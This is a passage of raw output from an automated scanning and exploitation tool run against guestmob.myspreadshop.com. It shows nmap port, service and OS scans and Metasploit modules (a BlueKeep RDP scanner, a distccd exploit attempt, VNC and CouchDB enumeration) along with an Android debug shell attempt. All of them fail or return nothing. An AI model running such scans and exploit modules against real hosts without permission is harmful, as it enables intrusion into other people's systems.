Completed NSE at 15:10, 0.00s elapsed
Initiating NSE at 15:10
Completed NSE at 15:10, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 15:10
Completed Parallel DNS resolution of 1 host. at 15:10, 0.08s elapsed
Initiating SYN Stealth Scan at 15:10
Scanning guestmob.myspreadshop.com (151.101.194.137) [1 port]
Discovered open port 3310/tcp on 151.101.194.137
Completed SYN Stealth Scan at 15:10, 0.09s elapsed (1 total ports)
Initiating Service scan at 15:10
Scanning 1 service on guestmob.myspreadshop.com (151.101.194.137)
Completed Service scan at 15:13, 164.36s elapsed (1 service on 1 host)
Initiating OS detection (try #1) against guestmob.myspreadshop.com (151.101.194.137)
Retrying OS detection (try #2) against guestmob.myspreadshop.com (151.101.194.137)
Initiating Traceroute at 15:13
Completed Traceroute at 15:13, 0.11s elapsed
Initiating Parallel DNS resolution of 1 host. at 15:13
Completed Parallel DNS resolution of 1 host. at 15:13, 0.11s elapsed
NSE: Script scanning 151.101.194.137.
Initiating NSE at 15:13
Completed NSE at 15:13, 14.21s elapsed
Initiating NSE at 15:13
Completed NSE at 15:13, 1.12s elapsed
Nmap scan report for guestmob.myspreadshop.com (151.101.194.137)
Host is up (0.11s latency).
Other addresses for guestmob.myspreadshop.com (not scanned): 151.101.2.137 151.101.66.137 151.101.130.137 2a04:4e42:400::649 2a04:4e42:600::649 2a04:4e42::649 2a04:4e42:200::649

PORT     STATE SERVICE      VERSION
3310/tcp open  dyna-access?
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.6 (90%), Linux 5.0 (90%), Linux 5.0 - 5.4 (90%), Linux 5.3 - 5.4 (90%), Linux 2.6.32 (90%), Linux 5.0 - 5.3 (89%), Linux 5.4 (88%), HP P2000 G3 NAS device (87%), Linux 3.1 (87%), Linux 3.2 (87%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 4.845 days (since Wed Feb 16 18:57:10 2022)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: All zeros

TRACEROUTE (using port 3310/tcp)
HOP RTT       ADDRESS
1   106.70 ms 151.101.194.137

NSE: Script Post-scanning.
Initiating NSE at 15:13
Completed NSE at 15:13, 0.00s elapsed
Initiating NSE at 15:13
Completed NSE at 15:13, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 185.70 seconds
           Raw packets sent: 67 (6.368KB) | Rcvd: 46 (3.164KB)
 + -- --=[Port 3128 opened... running tests...
====================================================================================•x[2022-02-21](15:13)x•
 RUNNING NMAP SCRIPTS 
====================================================================================•x[2022-02-21](15:13)x•
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-21 15:13 EST
NSE: Loaded 49 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 15:13
Completed NSE at 15:13, 0.00s elapsed
Initiating NSE at 15:13
Completed NSE at 15:13, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 15:13
Completed Parallel DNS resolution of 1 host. at 15:13, 0.12s elapsed
Initiating SYN Stealth Scan at 15:13
Scanning guestmob.myspreadshop.com (151.101.130.137) [1 port]
Discovered open port 3128/tcp on 151.101.130.137
Completed SYN Stealth Scan at 15:13, 0.12s elapsed (1 total ports)
Initiating Service scan at 15:13
Scanning 1 service on guestmob.myspreadshop.com (151.101.130.137)
Completed Service scan at 15:16, 175.08s elapsed (1 service on 1 host)
Initiating OS detection (try #1) against guestmob.myspreadshop.com (151.101.130.137)
Retrying OS detection (try #2) against guestmob.myspreadshop.com (151.101.130.137)
Initiating Traceroute at 15:16
Completed Traceroute at 15:16, 0.15s elapsed
Initiating Parallel DNS resolution of 1 host. at 15:16
Completed Parallel DNS resolution of 1 host. at 15:16, 0.20s elapsed
NSE: Script scanning 151.101.130.137.
Initiating NSE at 15:16
Completed NSE at 15:17, 30.30s elapsed
Initiating NSE at 15:17
Completed NSE at 15:17, 1.26s elapsed
Nmap scan report for guestmob.myspreadshop.com (151.101.130.137)
Host is up (0.13s latency).
Other addresses for guestmob.myspreadshop.com (not scanned): 151.101.194.137 151.101.2.137 151.101.66.137 2a04:4e42:400::649 2a04:4e42:600::649 2a04:4e42::649 2a04:4e42:200::649

PORT     STATE SERVICE     VERSION
3128/tcp open  squid-http?
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.6 (90%), Linux 5.0 - 5.4 (90%), Linux 5.3 - 5.4 (90%), Linux 2.6.32 (90%), Linux 5.0 (89%), Linux 5.0 - 5.3 (89%), Linux 5.4 (89%), HP P2000 G3 NAS device (87%), Linux 3.1 (87%), Linux 3.2 (87%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 27.511 days (since Tue Jan 25 03:01:21 2022)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=257 (Good luck!)
IP ID Sequence Generation: All zeros

TRACEROUTE (using port 3128/tcp)
HOP RTT       ADDRESS
1   145.56 ms 151.101.130.137

NSE: Script Post-scanning.
Initiating NSE at 15:17
Completed NSE at 15:17, 0.00s elapsed
Initiating NSE at 15:17
Completed NSE at 15:17, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 212.53 seconds
           Raw packets sent: 67 (6.368KB) | Rcvd: 53 (3.744KB)
 + -- --=[Port 3389 opened... running tests...
====================================================================================•x[2022-02-21](15:17)x•
 RUNNING NMAP SCRIPTS 
====================================================================================•x[2022-02-21](15:17)x•
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-21 15:17 EST
NSE: Loaded 49 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 15:17
Completed NSE at 15:17, 0.00s elapsed
Initiating NSE at 15:17
Completed NSE at 15:17, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 15:17
Completed Parallel DNS resolution of 1 host. at 15:17, 0.09s elapsed
Initiating SYN Stealth Scan at 15:17
Scanning guestmob.myspreadshop.com (151.101.2.137) [1 port]
Discovered open port 3389/tcp on 151.101.2.137
Completed SYN Stealth Scan at 15:17, 0.16s elapsed (1 total ports)
Initiating Service scan at 15:17
Scanning 1 service on guestmob.myspreadshop.com (151.101.2.137)
Completed Service scan at 15:20, 160.86s elapsed (1 service on 1 host)
Initiating OS detection (try #1) against guestmob.myspreadshop.com (151.101.2.137)
Retrying OS detection (try #2) against guestmob.myspreadshop.com (151.101.2.137)
Initiating Traceroute at 15:20
Completed Traceroute at 15:20, 0.17s elapsed
Initiating Parallel DNS resolution of 1 host. at 15:20
Completed Parallel DNS resolution of 1 host. at 15:20, 0.19s elapsed
NSE: Script scanning 151.101.2.137.
Initiating NSE at 15:20
Completed NSE at 15:20, 15.84s elapsed
Initiating NSE at 15:20
Completed NSE at 15:20, 1.11s elapsed
Nmap scan report for guestmob.myspreadshop.com (151.101.2.137)
Host is up (0.18s latency).
Other addresses for guestmob.myspreadshop.com (not scanned): 151.101.66.137 151.101.130.137 151.101.194.137 2a04:4e42:200::649 2a04:4e42:400::649 2a04:4e42:600::649 2a04:4e42::649

PORT     STATE SERVICE        VERSION
3389/tcp open  ms-wbt-server?
|_rdp-enum-encryption: Received unhandled packet
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.6 (90%), Linux 5.0 (90%), Linux 5.0 - 5.4 (90%), Linux 5.3 - 5.4 (90%), Linux 2.6.32 (90%), Linux 5.0 - 5.3 (89%), Linux 5.4 (88%), HP P2000 G3 NAS device (87%), Linux 3.1 (87%), Linux 3.2 (87%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 10.865 days (since Thu Feb 10 18:35:32 2022)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: All zeros

TRACEROUTE (using port 3389/tcp)
HOP RTT       ADDRESS
1   169.34 ms 151.101.2.137

NSE: Script Post-scanning.
Initiating NSE at 15:20
Completed NSE at 15:20, 0.00s elapsed
Initiating NSE at 15:20
Completed NSE at 15:20, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 187.45 seconds
           Raw packets sent: 68 (6.420KB) | Rcvd: 55 (4.208KB)
====================================================================================•x[2022-02-21](15:20)x•
 RUNNING METASPLOIT MODULES 
====================================================================================•x[2022-02-21](15:20)x•
RHOSTS => guestmob.myspreadshop.com
[*] 151.101.194.137:3389  - 151.101.194.137:3389 - Cannot reliably check exploitability.
[*] guestmob.myspreadshop.com:3389 - Scanned 1 of 8 hosts (12% complete)
[*] 151.101.2.137:3389    - 151.101.2.137:3389 - Cannot reliably check exploitability.
[*] guestmob.myspreadshop.com:3389 - Scanned 2 of 8 hosts (25% complete)
[*] 151.101.66.137:3389   - 151.101.66.137:3389 - Cannot reliably check exploitability.
[*] guestmob.myspreadshop.com:3389 - Scanned 3 of 8 hosts (37% complete)
[*] 151.101.130.137:3389  - 151.101.130.137:3389 - Cannot reliably check exploitability.
[*] guestmob.myspreadshop.com:3389 - Scanned 4 of 8 hosts (50% complete)
[*] 2a04:4e42:400::649:3389 - 2a04:4e42:400::649:3389 - Cannot reliably check exploitability.
[*] guestmob.myspreadshop.com:3389 - Scanned 5 of 8 hosts (62% complete)
[*] 2a04:4e42:600::649:3389 - 2a04:4e42:600::649:3389 - Cannot reliably check exploitability.
[*] guestmob.myspreadshop.com:3389 - Scanned 6 of 8 hosts (75% complete)
[*] 2a04:4e42::649:3389   - 2a04:4e42::649:3389 - Cannot reliably check exploitability.
[*] guestmob.myspreadshop.com:3389 - Scanned 7 of 8 hosts (87% complete)
[*] 2a04:4e42:200::649:3389 - 2a04:4e42:200::649:3389 - Cannot reliably check exploitability.
[*] guestmob.myspreadshop.com:3389 - Scanned 8 of 8 hosts (100% complete)
[*] Auxiliary module execution completed
====================================================================================•x[2022-02-21](15:21)x•
 RUNNING KEEPBLUE CVE-2019-0708 RCE SCANNER 
====================================================================================•x[2022-02-21](15:21)x•
RHOSTS => guestmob.myspreadshop.com
[*] guestmob.myspreadshop.com:3389 - Scanned 1 of 8 hosts (12% complete)
[*] guestmob.myspreadshop.com:3389 - Scanned 2 of 8 hosts (25% complete)
[*] guestmob.myspreadshop.com:3389 - Scanned 3 of 8 hosts (37% complete)
[*] guestmob.myspreadshop.com:3389 - Scanned 4 of 8 hosts (50% complete)
[*] guestmob.myspreadshop.com:3389 - Scanned 5 of 8 hosts (62% complete)
[*] guestmob.myspreadshop.com:3389 - Scanned 6 of 8 hosts (75% complete)
[*] guestmob.myspreadshop.com:3389 - Scanned 7 of 8 hosts (87% complete)
[*] guestmob.myspreadshop.com:3389 - Scanned 8 of 8 hosts (100% complete)
[*] Auxiliary module execution completed
====================================================================================•x[2022-02-21](15:21)x•
 RUNNING RDESKTOP CONNECTION 
====================================================================================•x[2022-02-21](15:21)x•
modes/normal.sh: line 857: rdesktop: command not found
 + -- --=[Port 3632 opened... running tests...
====================================================================================•x[2022-02-21](15:21)x•
 RUNNING NMAP SCRIPTS 
====================================================================================•x[2022-02-21](15:21)x•
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-21 15:21 EST
NSE: Loaded 47 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 15:21
Completed NSE at 15:21, 0.00s elapsed
Initiating NSE at 15:21
Completed NSE at 15:21, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 15:21
Completed Parallel DNS resolution of 1 host. at 15:21, 0.10s elapsed
Initiating SYN Stealth Scan at 15:21
Scanning guestmob.myspreadshop.com (151.101.2.137) [1 port]
Discovered open port 3632/tcp on 151.101.2.137
Completed SYN Stealth Scan at 15:21, 0.16s elapsed (1 total ports)
Initiating Service scan at 15:21
Scanning 1 service on guestmob.myspreadshop.com (151.101.2.137)
Completed Service scan at 15:24, 165.70s elapsed (1 service on 1 host)
Initiating OS detection (try #1) against guestmob.myspreadshop.com (151.101.2.137)
Retrying OS detection (try #2) against guestmob.myspreadshop.com (151.101.2.137)
Initiating Traceroute at 15:24
Completed Traceroute at 15:24, 0.12s elapsed
Initiating Parallel DNS resolution of 1 host. at 15:24
Completed Parallel DNS resolution of 1 host. at 15:24, 0.08s elapsed
NSE: Script scanning 151.101.2.137.
Initiating NSE at 15:24
Completed NSE at 15:24, 15.54s elapsed
Initiating NSE at 15:24
Completed NSE at 15:24, 1.18s elapsed
Nmap scan report for guestmob.myspreadshop.com (151.101.2.137)
Host is up (0.13s latency).
Other addresses for guestmob.myspreadshop.com (not scanned): 151.101.66.137 151.101.130.137 151.101.194.137 2a04:4e42:600::649 2a04:4e42::649 2a04:4e42:200::649 2a04:4e42:400::649

PORT     STATE SERVICE  VERSION
3632/tcp open  distccd?
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.6 (90%), Linux 5.0 - 5.4 (90%), Linux 5.3 - 5.4 (90%), Linux 2.6.32 (90%), Linux 5.0 (89%), Linux 5.0 - 5.3 (89%), Linux 5.4 (89%), HP P2000 G3 NAS device (87%), Linux 3.1 (87%), Linux 3.2 (87%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 10.868 days (since Thu Feb 10 18:35:32 2022)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IP ID Sequence Generation: All zeros

TRACEROUTE (using port 3632/tcp)
HOP RTT       ADDRESS
1   119.00 ms 151.101.2.137

NSE: Script Post-scanning.
Initiating NSE at 15:24
Completed NSE at 15:24, 0.00s elapsed
Initiating NSE at 15:24
Completed NSE at 15:24, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 198.24 seconds
           Raw packets sent: 71 (6.592KB) | Rcvd: 81 (6.914KB)
====================================================================================•x[2022-02-21](15:24)x•
 RUNNING METASPLOIT MODULES 
====================================================================================•x[2022-02-21](15:24)x•
RHOST => guestmob.myspreadshop.com
RHOSTS => guestmob.myspreadshop.com
RHOST => guestmob.myspreadshop.com
LHOST => 127.0.0.1
LPORT => 4444
[*] Exploiting target 151.101.66.137
[-] 151.101.66.137:3632 - Exploit failed: A payload has not been selected.
[*] Exploiting target 151.101.130.137
[-] 151.101.130.137:3632 - Exploit failed: A payload has not been selected.
[*] Exploiting target 151.101.194.137
[-] 151.101.194.137:3632 - Exploit failed: A payload has not been selected.
[*] Exploiting target 151.101.2.137
[-] 151.101.2.137:3632 - Exploit failed: A payload has not been selected.
[*] Exploiting target 2a04:4e42::649
[-] 2a04:4e42::649:3632 - Exploit failed: A payload has not been selected.
[*] Exploiting target 2a04:4e42:200::649
[-] 2a04:4e42:200::649:3632 - Exploit failed: A payload has not been selected.
[*] Exploiting target 2a04:4e42:400::649
[-] 2a04:4e42:400::649:3632 - Exploit failed: A payload has not been selected.
[*] Exploiting target 2a04:4e42:600::649
[-] 2a04:4e42:600::649:3632 - Exploit failed: A payload has not been selected.
[*] Exploit completed, but no session was created.
 + -- --=[Port 5432 closed... skipping.
 + -- --=[Port 5555 opened... running tests...
====================================================================================•x[2022-02-21](15:25)x•
 CONNECTING TO ANDROID DEBUG SHELL 
====================================================================================•x[2022-02-21](15:25)x•
* daemon not running; starting now at tcp:5037
* daemon started successfully
failed to connect to guestmob.myspreadshop.com:5555
error: device offline
 + -- --=[Port 5800 opened... running tests...
====================================================================================•x[2022-02-21](15:25)x•
 RUNNING NMAP SCRIPTS 
====================================================================================•x[2022-02-21](15:25)x•
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-21 15:25 EST
NSE: Loaded 49 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 15:25
Completed NSE at 15:25, 0.00s elapsed
Initiating NSE at 15:25
Completed NSE at 15:25, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 15:25
Completed Parallel DNS resolution of 1 host. at 15:25, 0.09s elapsed
Initiating SYN Stealth Scan at 15:25
Scanning guestmob.myspreadshop.com (151.101.2.137) [1 port]
Discovered open port 5800/tcp on 151.101.2.137
Completed SYN Stealth Scan at 15:25, 0.14s elapsed (1 total ports)
Initiating Service scan at 15:25
Scanning 1 service on guestmob.myspreadshop.com (151.101.2.137)
Completed Service scan at 15:28, 159.39s elapsed (1 service on 1 host)
Initiating OS detection (try #1) against guestmob.myspreadshop.com (151.101.2.137)
Retrying OS detection (try #2) against guestmob.myspreadshop.com (151.101.2.137)
Initiating Traceroute at 15:28
Completed Traceroute at 15:28, 0.17s elapsed
Initiating Parallel DNS resolution of 1 host. at 15:28
Completed Parallel DNS resolution of 1 host. at 15:28, 0.08s elapsed
NSE: Script scanning 151.101.2.137.
Initiating NSE at 15:28
Completed NSE at 15:28, 24.53s elapsed
Initiating NSE at 15:28
Completed NSE at 15:28, 8.26s elapsed
Nmap scan report for guestmob.myspreadshop.com (151.101.2.137)
Host is up (0.15s latency).
Other addresses for guestmob.myspreadshop.com (not scanned): 151.101.66.137 151.101.130.137 151.101.194.137 2a04:4e42::649 2a04:4e42:200::649 2a04:4e42:400::649 2a04:4e42:600::649

PORT     STATE SERVICE   VERSION
5800/tcp open  vnc-http?
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.6 (90%), Linux 5.3 - 5.4 (90%), Linux 2.6.32 (90%), Linux 5.0 (89%), Linux 5.4 (89%), Linux 5.0 - 5.4 (89%), Linux 5.0 - 5.3 (88%), HP P2000 G3 NAS device (87%), Linux 3.1 (87%), Linux 3.2 (87%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 10.870 days (since Thu Feb 10 18:35:32 2022)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=254 (Good luck!)
IP ID Sequence Generation: All zeros

TRACEROUTE (using port 5800/tcp)
HOP RTT       ADDRESS
1   172.13 ms 151.101.2.137

NSE: Script Post-scanning.
Initiating NSE at 15:28
Completed NSE at 15:28, 0.00s elapsed
Initiating NSE at 15:28
Completed NSE at 15:28, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 198.52 seconds
           Raw packets sent: 69 (6.488KB) | Rcvd: 44 (2.696KB)
 + -- --=[Port 5900 opened... running tests...
====================================================================================•x[2022-02-21](15:28)x•
 RUNNING NMAP SCRIPTS 
====================================================================================•x[2022-02-21](15:28)x•
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-21 15:28 EST
NSE: Loaded 49 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 15:28
Completed NSE at 15:28, 0.00s elapsed
Initiating NSE at 15:28
Completed NSE at 15:28, 0.00s elapsed
Initiating Ping Scan at 15:28
Scanning guestmob.myspreadshop.com (151.101.130.137) [4 ports]
Completed Ping Scan at 15:28, 0.09s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:28
Completed Parallel DNS resolution of 1 host. at 15:28, 0.07s elapsed
Initiating SYN Stealth Scan at 15:28
Scanning guestmob.myspreadshop.com (151.101.130.137) [1 port]
Discovered open port 5900/tcp on 151.101.130.137
Completed SYN Stealth Scan at 15:28, 0.11s elapsed (1 total ports)
Initiating Service scan at 15:28
Scanning 1 service on guestmob.myspreadshop.com (151.101.130.137)
Completed Service scan at 15:31, 160.11s elapsed (1 service on 1 host)
Initiating OS detection (try #1) against guestmob.myspreadshop.com (151.101.130.137)
Retrying OS detection (try #2) against guestmob.myspreadshop.com (151.101.130.137)
Initiating Traceroute at 15:31
Completed Traceroute at 15:31, 0.14s elapsed
Initiating Parallel DNS resolution of 1 host. at 15:31
Completed Parallel DNS resolution of 1 host. at 15:31, 0.09s elapsed
NSE: Script scanning 151.101.130.137.
Initiating NSE at 15:31
Completed NSE at 15:31, 5.08s elapsed
Initiating NSE at 15:31
Completed NSE at 15:31, 5.07s elapsed
Nmap scan report for guestmob.myspreadshop.com (151.101.130.137)
Host is up (0.11s latency).
Other addresses for guestmob.myspreadshop.com (not scanned): 151.101.194.137 151.101.2.137 151.101.66.137 2a04:4e42:600::649 2a04:4e42::649 2a04:4e42:200::649 2a04:4e42:400::649

PORT     STATE SERVICE VERSION
5900/tcp open  vnc?
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.6 (90%), Linux 5.3 - 5.4 (90%), Linux 2.6.32 (90%), Linux 5.0 (89%), Linux 5.0 - 5.3 (89%), Linux 5.4 (89%), Linux 5.0 - 5.4 (89%), HP P2000 G3 NAS device (87%), Linux 3.1 (87%), Linux 3.2 (87%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 133.597 days (since Mon Oct 11 02:12:12 2021)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=254 (Good luck!)
IP ID Sequence Generation: All zeros

TRACEROUTE (using port 443/tcp)
HOP RTT       ADDRESS
1   138.30 ms 151.101.130.137

NSE: Script Post-scanning.
Initiating NSE at 15:31
Completed NSE at 15:31, 0.00s elapsed
Initiating NSE at 15:31
Completed NSE at 15:31, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 179.55 seconds
           Raw packets sent: 113 (9.190KB) | Rcvd: 79 (4.894KB)
====================================================================================•x[2022-02-21](15:31)x•
 RUNNING METASPLOIT MODULES 
====================================================================================•x[2022-02-21](15:31)x•
RHOSTS => guestmob.myspreadshop.com
[-] 151.101.130.137:5900  - 151.101.130.137:5900 - Handshake failed: Unable to obtain banner from server
[*] guestmob.myspreadshop.com:5900 - Scanned 1 of 8 hosts (12% complete)
[-] 151.101.194.137:5900  - 151.101.194.137:5900 - Handshake failed: Unable to obtain banner from server
[*] guestmob.myspreadshop.com:5900 - Scanned 2 of 8 hosts (25% complete)
[-] 151.101.2.137:5900    - 151.101.2.137:5900 - Handshake failed: Unable to obtain banner from server
[*] guestmob.myspreadshop.com:5900 - Scanned 3 of 8 hosts (37% complete)
[-] 151.101.66.137:5900   - 151.101.66.137:5900 - Handshake failed: Unable to obtain banner from server
[*] guestmob.myspreadshop.com:5900 - Scanned 4 of 8 hosts (50% complete)
[*] guestmob.myspreadshop.com:5900 - Scanned 5 of 8 hosts (62% complete)
[*] guestmob.myspreadshop.com:5900 - Scanned 6 of 8 hosts (75% complete)
[*] guestmob.myspreadshop.com:5900 - Scanned 7 of 8 hosts (87% complete)
[*] guestmob.myspreadshop.com:5900 - Scanned 8 of 8 hosts (100% complete)
[*] Auxiliary module execution completed
 + -- --=[Port 5984 opened... running tests...
====================================================================================•x[2022-02-21](15:32)x•
 RUNNING NMAP SCRIPTS 
====================================================================================•x[2022-02-21](15:32)x•
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-21 15:32 EST
NSE: Loaded 48 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 15:32
Completed NSE at 15:32, 0.00s elapsed
Initiating NSE at 15:32
Completed NSE at 15:32, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 15:32
Completed Parallel DNS resolution of 1 host. at 15:32, 0.09s elapsed
Initiating SYN Stealth Scan at 15:32
Scanning guestmob.myspreadshop.com (151.101.130.137) [1 port]
Discovered open port 5984/tcp on 151.101.130.137
Completed SYN Stealth Scan at 15:32, 0.11s elapsed (1 total ports)
Initiating Service scan at 15:32
Scanning 1 service on guestmob.myspreadshop.com (151.101.130.137)
Completed Service scan at 15:35, 158.58s elapsed (1 service on 1 host)
Initiating OS detection (try #1) against guestmob.myspreadshop.com (151.101.130.137)
Retrying OS detection (try #2) against guestmob.myspreadshop.com (151.101.130.137)
Initiating Traceroute at 15:35
Completed Traceroute at 15:35, 0.10s elapsed
Initiating Parallel DNS resolution of 1 host. at 15:35
Completed Parallel DNS resolution of 1 host. at 15:35, 0.15s elapsed
NSE: Script scanning 151.101.130.137.
Initiating NSE at 15:35
Completed NSE at 15:35, 8.09s elapsed
Initiating NSE at 15:35
Completed NSE at 15:35, 1.09s elapsed
Nmap scan report for guestmob.myspreadshop.com (151.101.130.137)
Host is up (0.086s latency).
Other addresses for guestmob.myspreadshop.com (not scanned): 151.101.194.137 151.101.2.137 151.101.66.137 2a04:4e42:600::649 2a04:4e42::649 2a04:4e42:200::649 2a04:4e42:400::649

PORT     STATE SERVICE  VERSION
5984/tcp open  couchdb?
|_couchdb-stats: guestmob.myspreadshop.com did not respond with any data.
|_couchdb-databases: guestmob.myspreadshop.com did not respond with any data.
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.6 (90%), Linux 5.0 (90%), Linux 5.0 - 5.4 (90%), Linux 5.3 - 5.4 (90%), Linux 2.6.32 (90%), Linux 5.0 - 5.3 (89%), Linux 5.4 (88%), HP P2000 G3 NAS device (87%), Linux 3.1 (87%), Linux 3.2 (87%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 27.524 days (since Tue Jan 25 03:01:21 2022)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: All zeros

TRACEROUTE (using port 5984/tcp)
HOP RTT      ADDRESS
1   97.74 ms 151.101.130.137

NSE: Script Post-scanning.
Initiating NSE at 15:35
Completed NSE at 15:35, 0.00s elapsed
Initiating NSE at 15:35
Completed NSE at 15:35, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 173.13 seconds
           Raw packets sent: 67 (6.368KB) | Rcvd: 39 (2.440KB)
====================================================================================•x[2022-02-21](15:35)x•
 RUNNING METASPLOIT MODULES 
====================================================================================•x[2022-02-21](15:35)x•
RHOST => guestmob.myspreadshop.com
[*] Running module against 151.101.130.137
[-] Auxiliary failed: Errno::ECONNRESET Connection reset by peer
[-] Call stack:
[-]   /usr/lib/ruby/2.7.0/socket.rb:452:in `__read_nonblock'
[-]   /usr/lib/ruby/2.7.0/socket.rb:452:in `read_nonblock'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-core-0.1.25/lib/rex/io/stream.rb:91:in `block in read'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-core-0.1.25/lib/rex/io/stream.rb:336:in `synchronize_access'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-core-0.1.25/lib/rex/io/stream.rb:89:in `read'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-core-0.1.25/lib/rex/io/stream.rb:223:in `get_once'
[-]   /usr/share/metasploit-framework/lib/rex/proto/http/client.rb:578:in `block in read_response'
[-]   /usr/lib/ruby/2.7.0/timeout.rb:95:in `block in timeout'
[-]   /usr/lib/ruby/2.7.0/timeout.rb:33:in `block in catch'
[-]   /usr/lib/ruby/2.7.0/timeout.rb:33:in `catch'
[-]   /usr/lib/ruby/2.7.0/timeout.rb:33:in `catch'
[-]   /usr/lib/ruby/2.7.0/timeout.rb:110:in `timeout'
[-]   /usr/share/metasploit-framework/lib/rex/proto/http/client.rb:567:in `read_response'
[-]   /usr/share/metasploit-framework/lib/rex/proto/http/client.rb:233:in `_send_recv'
[-]   /usr/share/metasploit-framework/lib/rex/proto/http/client.rb:208:in `send_recv'
[-]   /usr/share/metasploit-framework/lib/msf/core/exploit/remote/http_client.rb:374:in `send_request_raw'
[-]   /usr/share/metasploit-framework/lib/msf/core/exploit/remote/http_client.rb:430:in `send_request_cgi'
[-]   /usr/share/metasploit-framework/modules/auxiliary/scanner/couchdb/couchdb_enum.rb:102:in `get_dbs'
[-]   /usr/share/metasploit-framework/modules/auxiliary/scanner/couchdb/couchdb_enum.rb:225:in `run'
[*] Running module against 151.101.194.137
[-] Auxiliary failed: Errno::ECONNRESET Connection reset by peer
[-] Call stack:
[-]   /usr/lib/ruby/2.7.0/socket.rb:452:in `__read_nonblock'
[-]   /usr/lib/ruby/2.7.0/socket.rb:452:in `read_nonblock'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-core-0.1.25/lib/rex/io/stream.rb:91:in `block in read'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-core-0.1.25/lib/rex/io/stream.rb:336:in `synchronize_access'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-core-0.1.25/lib/rex/io/stream.rb:89:in `read'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-core-0.1.25/lib/rex/io/stream.rb:223:in `get_once'
[-]   /usr/share/metasploit-framework/lib/rex/proto/http/client.rb:578:in `block in read_response'
[-]   /usr/lib/ruby/2.7.0/timeout.rb:95:in `block in timeout'
[-]   /usr/lib/ruby/2.7.0/timeout.rb:33:in `block in catch'
[-]   /usr/lib/ruby/2.7.0/timeout.rb:33:in `catch'
[-]   /usr/lib/ruby/2.7.0/timeout.rb:33:in `catch'
[-]   /usr/lib/ruby/2.7.0/timeout.rb:110:in `timeout'
[-]   /usr/share/metasploit-framework/lib/rex/proto/http/client.rb:567:in `read_response'
[-]   /usr/share/metasploit-framework/lib/rex/proto/http/client.rb:233:in `_send_recv'
